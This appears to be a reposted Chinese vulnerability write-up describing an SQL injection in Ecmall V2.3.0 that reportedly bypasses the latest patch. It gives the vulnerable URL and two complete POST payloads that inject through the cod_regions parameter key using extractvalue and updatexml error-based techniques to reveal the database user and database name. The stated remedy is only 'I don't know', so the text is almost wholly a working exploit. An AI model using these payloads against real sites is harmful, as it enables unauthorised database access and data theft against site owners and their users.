打了最新的补丁
绕过方法:updatexml函数 extractvalue函数
url:
http://localhost/ecmall/index.php?app=my_shipping&act=edit&shipping_id=1payload1:
shipping_name=li&shipping_desc=asd&irst_price=10&step_price=0&enabled=1&sort_order=255&cod_regions[1' or extractvalue(1,concat(0x5c,(select user())))#]=v效果:
payload2:
shipping_name=li&shipping_desc=asd&irst_price=10&step_price=0&enabled=1&sort_order=255&cod_regions[1' or updatexml(2,concat(0x7e,(database())),0)#]=v效果:
修复方案:
我不知道
查看更多关于Ecmall V2.3.0-UTF8 正式版SQL注入漏洞(绕过过滤) - 网的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did15242